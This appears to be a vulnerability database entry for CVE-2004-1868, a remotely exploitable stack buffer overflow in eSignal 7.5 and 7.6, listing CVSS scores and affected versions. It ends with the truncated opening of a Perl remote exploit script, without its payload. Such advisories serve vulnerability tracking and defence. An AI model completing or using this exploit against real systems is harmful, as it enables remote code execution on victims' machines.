7.5
CVSSv2

CVE-2004-1868

Published: 25/03/2004 Updated: 11/07/2017
CVSS v2 Base Score: 7.5 | Impact Score: 6.4 | Exploitability Score: 10
VMScore: 755
Vector: AV:N/AC:L/Au:N/C:P/I:P/A:P

Vulnerability Summary

Stack-based buffer overflow in WinSig.exe in eSignal 7.5 and 7.6 allows remote malicious users to execute arbitrary code via a long STREAMQUOTE tag.

Vulnerable Product Search on Vulmon Subscribe to Product

esignal esignal 7.6

esignal esignal 7.5

Exploits

#!/usr/bin/perl # # eSignal v76 remote exploit (c) VizibleSoft =*= viziblesoftcom/insect # # 25-mAR-2004 # use IO::Socket; sub usage { die("\nUsage: perl $0 host port\n"); } print "\r\neSignal v76 remote exploit, (c) VizibleSoftcom\r\n"; my $ip = $ARGV[0] || usage(); my $port = $ARGV[1] || usage(); my $data = ""; my $r ...